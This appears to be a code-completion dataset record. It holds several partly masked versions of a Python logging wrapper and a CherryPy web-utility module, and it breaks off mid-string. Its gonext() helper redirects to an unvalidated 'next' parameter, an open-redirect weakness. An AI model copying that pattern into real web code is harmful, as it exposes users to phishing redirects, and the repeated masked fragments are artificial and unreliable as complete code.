"step-5": "# -*- coding: utf-8 -*-\r\n\r\nfrom .log_config import LogBase\r\nimport os\r\n\r\n__all__ = ['MyLog']\r\n\r\n\r\nclass MyLog(LogBase):\r\n \"\"\"\r\n 功能:\r\n 将日志分日志等级记录,并自动压缩2019-11-11.info.log.gz\r\n\r\n 参数:\r\n :param dir_path: 日志记录的路径,默认是当前路径下的log文件夹\r\n :param logger_name: logger对象的名字\r\n :param info_name: 保存info等级的文件名字\r\n :param error_name:\r\n :param warning_name:\r\n :param debug_name:\r\n :param interval: 压缩日志的频率,默认是7天\r\n :param detail: bool值,记录日志是否为详细记录\r\n :param debug: 是否记录debug,默认不记录\r\n :param info: 是否记录info,默认记录\r\n :param error:\r\n :param warning:\r\n 实例方法:\r\n get_logger()-->logger\r\n\r\n 使用举例:\r\n # 记录四种类型的日志\r\n logger = MyLog(debug=True).get_logger()\r\n logger.info('info')\r\n logger.debug('debug')\r\n logger.error('error')\r\n logger.warning('warning')\r\n\r\n # # # # # # # # # # # # # # # # # # # # # # # # #\r\n\r\n # 只记录错误日志\r\n logger = MyLog(info=False,warning=False).get_logger()\r\n logger.info('info')\r\n logger.debug('debug')\r\n logger.error('error')\r\n logger.warning('warning')\r\n 注意:\r\n MyLog()的实例只会同时存在一个,默认记录首次创建实例的属性.\r\n 例如:\r\n\r\n mylog = MyLog('./logs/logs/')\r\n mylog2 = MyLog()\r\n logger = mylog.get_logger()\r\n logger2 = mylog2.get_logger()\r\n logger.info('info')\r\n\r\n logger2 = MyLog('./logs/logs2/').get_logger()\r\n logger2.info('info2')\r\n\r\n 以上两个logger logger2,会以logger(第一次创建实例)的属性为准,日志会存放在./logs/logs/下\r\n\r\n\r\n\r\n \"\"\"\r\n\r\n def __init__(self, log_path: str = './logs/', **kwargs):\r\n self.type_need(log_path, str)\r\n if not log_path.endswith('/'):\r\n log_path += '/'\r\n if not os.path.exists(log_path):\r\n os.makedirs(log_path)\r\n super(MyLog, self).__init__(dir_path=log_path, **kwargs)\r\n\r\n def get_logger(self):\r\n return self._get_logger()\r\n\r\n @staticmethod\r\n def type_need(parm, type_):\r\n if not isinstance(parm, type_):\r\n raise TypeError(f'expect {type_},but got {type(parm)}')\r\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def redirect(url, status=None):
"""Raise a redirect to the specified address.
"""
raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
allowed_methods = list(allowed_methods)
if 'GET' in allowed_methods:
if 'HEAD' not in allowed_methods:
allowed_methods.append('HEAD')
allowed_methods.sort()
if cherrypy.request.method not in allowed_methods:
cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)
raise cherrypy.HTTPError(405)
def gonext():
"""Redirect to the url specified by the "next" parameter, if there is one.
"""
next = cherrypy.request.params.get('next', '')
if next != '':
redirect(next)
<|reserved_special_token_0|>
def get_or_404(cls, id):
try:
return cls.objects.get(unicode(id))
except KeyError:
raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
<|reserved_special_token_0|>
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return v[0]
return default
<|reserved_special_token_0|>
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get('new' + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get('old' + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = json.dumps(value),
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def redirect(url, status=None):
"""Raise a redirect to the specified address.
"""
raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
allowed_methods = list(allowed_methods)
if 'GET' in allowed_methods:
if 'HEAD' not in allowed_methods:
allowed_methods.append('HEAD')
allowed_methods.sort()
if cherrypy.request.method not in allowed_methods:
cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)
raise cherrypy.HTTPError(405)
def gonext():
"""Redirect to the url specified by the "next" parameter, if there is one.
"""
next = cherrypy.request.params.get('next', '')
if next != '':
redirect(next)
def url(*args, **kwargs):
"""Get the url for a given route.
"""
if len(args) == 0 and len(kwargs) == 0:
return cherrypy.url()
newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not
None and k.startswith('old'))
for k, v in kwargs.iteritems():
if k.startswith('new') or k.startswith('old'):
continue
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
for k, v in kwargs.iteritems():
if k[:3] != 'new':
continue
k = k[3:]
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
if len(args) > 0 and args[0] == 'static':
return config.STATIC_ASSETS_URL + '/'.join(args[1:])
return cherrypy.url(routes.url_for(*args, **newkwargs))
<|reserved_special_token_0|>
def get_or_404(cls, id):
try:
return cls.objects.get(unicode(id))
except KeyError:
raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
<|reserved_special_token_0|>
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return v[0]
return default
<|reserved_special_token_0|>
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get('new' + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get('old' + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = json.dumps(value),
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
def slugify(value):
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\\w\\s\\.-]', '_', value).strip().lower())
return re.sub('[-\\s]+', '-', value)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def redirect(url, status=None):
"""Raise a redirect to the specified address.
"""
raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
allowed_methods = list(allowed_methods)
if 'GET' in allowed_methods:
if 'HEAD' not in allowed_methods:
allowed_methods.append('HEAD')
allowed_methods.sort()
if cherrypy.request.method not in allowed_methods:
cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)
raise cherrypy.HTTPError(405)
def gonext():
"""Redirect to the url specified by the "next" parameter, if there is one.
"""
next = cherrypy.request.params.get('next', '')
if next != '':
redirect(next)
def url(*args, **kwargs):
"""Get the url for a given route.
"""
if len(args) == 0 and len(kwargs) == 0:
return cherrypy.url()
newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not
None and k.startswith('old'))
for k, v in kwargs.iteritems():
if k.startswith('new') or k.startswith('old'):
continue
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
for k, v in kwargs.iteritems():
if k[:3] != 'new':
continue
k = k[3:]
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
if len(args) > 0 and args[0] == 'static':
return config.STATIC_ASSETS_URL + '/'.join(args[1:])
return cherrypy.url(routes.url_for(*args, **newkwargs))
<|reserved_special_token_0|>
def get_or_404(cls, id):
try:
return cls.objects.get(unicode(id))
except KeyError:
raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
def listify(val):
"""Convert a value, as found in cherrypy parameters, into a list.
"""
if isinstance(val, basestring):
return [val]
if hasattr(val, '__iter__'):
return list(val)
return [val]
def listify_values(params):
"""Return a copy of a dict with values which were strings converted to
lists.
"""
return dict((k, listify(v)) for k, v in params.iteritems())
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return v[0]
return default
def getintparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single integer item, or None if
not supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return int(v[0])
return default
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get('new' + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get('old' + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = json.dumps(value),
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
def slugify(value):
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\\w\\s\\.-]', '_', value).strip().lower())
return re.sub('[-\\s]+', '-', value)
<|reserved_special_token_1|>
import cherrypy
import config
try:
from simplejson import json
except ImportError:
import json
import routes
import urllib
import re
def redirect(url, status=None):
"""Raise a redirect to the specified address.
"""
raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
allowed_methods = list(allowed_methods)
if 'GET' in allowed_methods:
if 'HEAD' not in allowed_methods:
allowed_methods.append('HEAD')
allowed_methods.sort()
if cherrypy.request.method not in allowed_methods:
cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)
raise cherrypy.HTTPError(405)
def gonext():
"""Redirect to the url specified by the "next" parameter, if there is one.
"""
next = cherrypy.request.params.get('next', '')
if next != '':
redirect(next)
def url(*args, **kwargs):
"""Get the url for a given route.
"""
if len(args) == 0 and len(kwargs) == 0:
return cherrypy.url()
newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not
None and k.startswith('old'))
for k, v in kwargs.iteritems():
if k.startswith('new') or k.startswith('old'):
continue
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
for k, v in kwargs.iteritems():
if k[:3] != 'new':
continue
k = k[3:]
if v is None:
try:
del newkwargs[k]
except KeyError:
pass
else:
newkwargs[k] = v
if len(args) > 0 and args[0] == 'static':
return config.STATIC_ASSETS_URL + '/'.join(args[1:])
return cherrypy.url(routes.url_for(*args, **newkwargs))
def queryparams(*args, **kwargs):
"""Encode a set of arguments as query parameters.
"""
args = dict(args)
args.update(kwargs)
return urllib.urlencode(args)
def get_or_404(cls, id):
try:
return cls.objects.get(unicode(id))
except KeyError:
raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
def listify(val):
"""Convert a value, as found in cherrypy parameters, into a list.
"""
if isinstance(val, basestring):
return [val]
if hasattr(val, '__iter__'):
return list(val)
return [val]
def listify_values(params):
"""Return a copy of a dict with values which were strings converted to
lists.
"""
return dict((k, listify(v)) for k, v in params.iteritems())
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return v[0]
return default
def getintparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single integer item, or None if
not supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0:
return int(v[0])
return default
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get('new' + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get('old' + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = json.dumps(value),
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
def slugify(value):
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\\w\\s\\.-]', '_', value).strip().lower())
return re.sub('[-\\s]+', '-', value)
<|reserved_special_token_1|>
import cherrypy
import config
try:
from simplejson import json
except ImportError:
import json
import routes
import urllib
import re
def redirect(url, status=None):
"""Raise a redirect to the specified address.
"""
raise cherrypy.HTTPRedirect(url, status)
def require_method(*allowed_methods):
allowed_methods = list(allowed_methods)
if "GET" in allowed_methods:
if "HEAD" not in allowed_methods:
allowed_methods.append("HEAD")
allowed_methods.sort()
if cherrypy.request.method not in allowed_methods:
cherrypy.response.headers['Allow'] = ", ".join(allowed_methods)
raise cherrypy.HTTPError(405)
def gonext():
"""Redirect to the url specified by the "next" parameter, if there is one.
"""
next = cherrypy.request.params.get('next', '')
if next != '':
redirect(next)
def url(*args, **kwargs):
"""Get the url for a given route.
"""
if len(args) == 0 and len(kwargs) == 0:
return cherrypy.url()
# First read the old args
newkwargs = dict(
(k, v[3:]) for (k, v) in kwargs.iteritems()
if v is not None and k.startswith('old')
)
# Apply neither new nor old args
for (k, v) in kwargs.iteritems():
if k.startswith('new') or k.startswith('old'):
continue
if v is None:
try:
del newkwargs[k]
except KeyError: pass
else:
newkwargs[k] = v
# Apply new args
for (k, v) in kwargs.iteritems():
if k[:3] != 'new':
continue
k = k[3:]
if v is None:
try:
del newkwargs[k]
except KeyError: pass
else:
newkwargs[k] = v
if len(args) > 0 and args[0] == 'static':
return config.STATIC_ASSETS_URL + '/'.join(args[1:])
return cherrypy.url(routes.url_for(*args, **newkwargs))
def queryparams(*args, **kwargs):
"""Encode a set of arguments as query parameters.
"""
args = dict(args)
args.update(kwargs)
return urllib.urlencode(args)
def get_or_404(cls, id):
try:
return cls.objects.get(unicode(id))
except KeyError:
raise cherrypy.NotFound
def locked(fn):
"""Decorator to ensure that the mutex is locked while calling a method.
The method's object must have a mutex in a property named "mutex".
"""
def locked_method(self, *args, **kwargs):
self.mutex.acquire()
try:
return fn(self, *args, **kwargs)
finally:
self.mutex.release()
return locked_method
def get_user():
from apps.store.models import User
try:
user = User.objects.get(u'_')
except KeyError:
user = User(None)
user.id = u'_'
User.objects.set(user)
return user
def get_settings():
from apps.store.models import Settings
try:
settings = Settings.objects.get(u'_')
except KeyError:
settings = Settings(None)
settings.id = u'_'
settings.set_roots(config.default_media_roots)
Settings.objects.set(settings)
return settings
def listify(val):
"""Convert a value, as found in cherrypy parameters, into a list.
"""
if isinstance(val, basestring):
return [val]
if hasattr(val, '__iter__'):
return list(val)
return [val]
def listify_values(params):
"""Return a copy of a dict with values which were strings converted to
lists.
"""
return dict((k, listify(v)) for (k, v) in params.iteritems())
def getparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single item, or None if not
supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0: return v[0]
return default
def getintparam(name, default=None, stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
The query parameter is always returned as a single integer item, or None if
not supplied. If supplied multiple times, one of the values is returned.
"""
v = getparamlist(name, stash=stash, params=params)
if len(v) > 0: return int(v[0])
return default
def getparamlist(name, default=[], stash=None, params=None):
"""Get a query parameter, in a nice standardised way, with some special
handling for old and new values.
Returns a list of values.
"""
if params is None:
params = cherrypy.request.params
v = params.get("new" + name, None)
if v is None:
v = params.get(name, None)
if v is None:
v = params.get("old" + name, None)
if v is None:
return default
v = listify(v)
if stash is not None:
stash[str(name)] = v
return v
def getorderparam(name):
"""Get the sequence of numbers stored in a parameter.
The parameter should contain the numbers separated by commas.
If invalid entries are found, raises an HTTP 400 error.
"""
for num in cherrypy.request.params.get(name, '').split(','):
if num.strip() == '':
continue
try:
yield int(num)
except ValueError:
raise cherrypy.HTTPError(400)
def jsonresp(value):
"""Return a json formatted value, and set appropriate headers.
"""
body = (json.dumps(value),)
cherrypy.response.headers['Content-Type'] = 'application/json'
return body
def slugify(value):
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s\.-]', '_', value).strip().lower())
return re.sub('[-\s]+', '-', value)
|
flexible
|
{
"blob_id": "dc28d8aa17347f07041ae218bbe4e1b0add27c24",
"index": 5669,
"step-1": "<mask token>\n\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if 'GET' in allowed_methods:\n if 'HEAD' not in allowed_methods:\n allowed_methods.append('HEAD')\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\n\n<mask token>\n\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise cherrypy.NotFound\n\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\n\ndef get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\n\n<mask token>\n\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return v[0]\n return default\n\n\n<mask token>\n\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get('new' + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get('old' + name, None)\n if v is None:\n return default\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = json.dumps(value),\n cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if 'GET' in allowed_methods:\n if 'HEAD' not in allowed_methods:\n allowed_methods.append('HEAD')\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\n\ndef url(*args, **kwargs):\n \"\"\"Get the url for a given route.\n\n \"\"\"\n if len(args) == 0 and len(kwargs) == 0:\n return cherrypy.url()\n newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not\n None and k.startswith('old'))\n for k, v in kwargs.iteritems():\n if k.startswith('new') or k.startswith('old'):\n continue\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n for k, v in kwargs.iteritems():\n if k[:3] != 'new':\n continue\n k = k[3:]\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n if len(args) > 0 and args[0] == 'static':\n return config.STATIC_ASSETS_URL + '/'.join(args[1:])\n return cherrypy.url(routes.url_for(*args, **newkwargs))\n\n\n<mask token>\n\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise cherrypy.NotFound\n\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\n\ndef get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\n\n<mask token>\n\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. If supplied multiple times, one of the values is returned.\n\n \"\"\"\n v = getparamlist(name, stash=stash, params=params)\n if len(v) > 0:\n return v[0]\n return default\n\n\n<mask token>\n\n\ndef getparamlist(name, default=[], stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n Returns a list of values.\n\n \"\"\"\n if params is None:\n params = cherrypy.request.params\n v = params.get('new' + name, None)\n if v is None:\n v = params.get(name, None)\n if v is None:\n v = params.get('old' + name, None)\n if v is None:\n return default\n v = listify(v)\n if stash is not None:\n stash[str(name)] = v\n return v\n\n\ndef getorderparam(name):\n \"\"\"Get the sequence of numbers stored in a parameter.\n\n The parameter should contain the numbers separated by commas.\n If invalid entries are found, raises an HTTP 400 error.\n\n \"\"\"\n for num in cherrypy.request.params.get(name, '').split(','):\n if num.strip() == '':\n continue\n try:\n yield int(num)\n except ValueError:\n raise cherrypy.HTTPError(400)\n\n\ndef jsonresp(value):\n \"\"\"Return a json formatted value, and set appropriate headers.\n\n \"\"\"\n body = json.dumps(value),\n cherrypy.response.headers['Content-Type'] = 'application/json'\n return body\n\n\ndef slugify(value):\n import unicodedata\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')\n value = unicode(re.sub('[^\\\\w\\\\s\\\\.-]', '_', value).strip().lower())\n return re.sub('[-\\\\s]+', '-', value)\n",
"step-3": "<mask token>\n\n\ndef redirect(url, status=None):\n \"\"\"Raise a redirect to the specified address.\n\n \"\"\"\n raise cherrypy.HTTPRedirect(url, status)\n\n\ndef require_method(*allowed_methods):\n allowed_methods = list(allowed_methods)\n if 'GET' in allowed_methods:\n if 'HEAD' not in allowed_methods:\n allowed_methods.append('HEAD')\n allowed_methods.sort()\n if cherrypy.request.method not in allowed_methods:\n cherrypy.response.headers['Allow'] = ', '.join(allowed_methods)\n raise cherrypy.HTTPError(405)\n\n\ndef gonext():\n \"\"\"Redirect to the url specified by the \"next\" parameter, if there is one.\n\n \"\"\"\n next = cherrypy.request.params.get('next', '')\n if next != '':\n redirect(next)\n\n\ndef url(*args, **kwargs):\n \"\"\"Get the url for a given route.\n\n \"\"\"\n if len(args) == 0 and len(kwargs) == 0:\n return cherrypy.url()\n newkwargs = dict((k, v[3:]) for k, v in kwargs.iteritems() if v is not\n None and k.startswith('old'))\n for k, v in kwargs.iteritems():\n if k.startswith('new') or k.startswith('old'):\n continue\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n for k, v in kwargs.iteritems():\n if k[:3] != 'new':\n continue\n k = k[3:]\n if v is None:\n try:\n del newkwargs[k]\n except KeyError:\n pass\n else:\n newkwargs[k] = v\n if len(args) > 0 and args[0] == 'static':\n return config.STATIC_ASSETS_URL + '/'.join(args[1:])\n return cherrypy.url(routes.url_for(*args, **newkwargs))\n\n\n<mask token>\n\n\ndef get_or_404(cls, id):\n try:\n return cls.objects.get(unicode(id))\n except KeyError:\n raise cherrypy.NotFound\n\n\ndef locked(fn):\n \"\"\"Decorator to ensure that the mutex is locked while calling a method.\n\n The method's object must have a mutex in a property named \"mutex\".\n\n \"\"\"\n\n def locked_method(self, *args, **kwargs):\n self.mutex.acquire()\n try:\n return fn(self, *args, **kwargs)\n finally:\n self.mutex.release()\n return locked_method\n\n\ndef get_user():\n from apps.store.models import User\n try:\n user = User.objects.get(u'_')\n except KeyError:\n user = User(None)\n user.id = u'_'\n User.objects.set(user)\n return user\n\n\ndef get_settings():\n from apps.store.models import Settings\n try:\n settings = Settings.objects.get(u'_')\n except KeyError:\n settings = Settings(None)\n settings.id = u'_'\n settings.set_roots(config.default_media_roots)\n Settings.objects.set(settings)\n return settings\n\n\ndef listify(val):\n \"\"\"Convert a value, as found in cherrypy parameters, into a list.\n\n \"\"\"\n if isinstance(val, basestring):\n return [val]\n if hasattr(val, '__iter__'):\n return list(val)\n return [val]\n\n\ndef listify_values(params):\n \"\"\"Return a copy of a dict with values which were strings converted to\n lists.\n\n \"\"\"\n return dict((k, listify(v)) for k, v in params.iteritems())\n\n\ndef getparam(name, default=None, stash=None, params=None):\n \"\"\"Get a query parameter, in a nice standardised way, with some special\n handling for old and new values.\n\n The query parameter is always returned as a single item, or None if not\n supplied. If supplied multiple times, one of the values is returned.\n\n 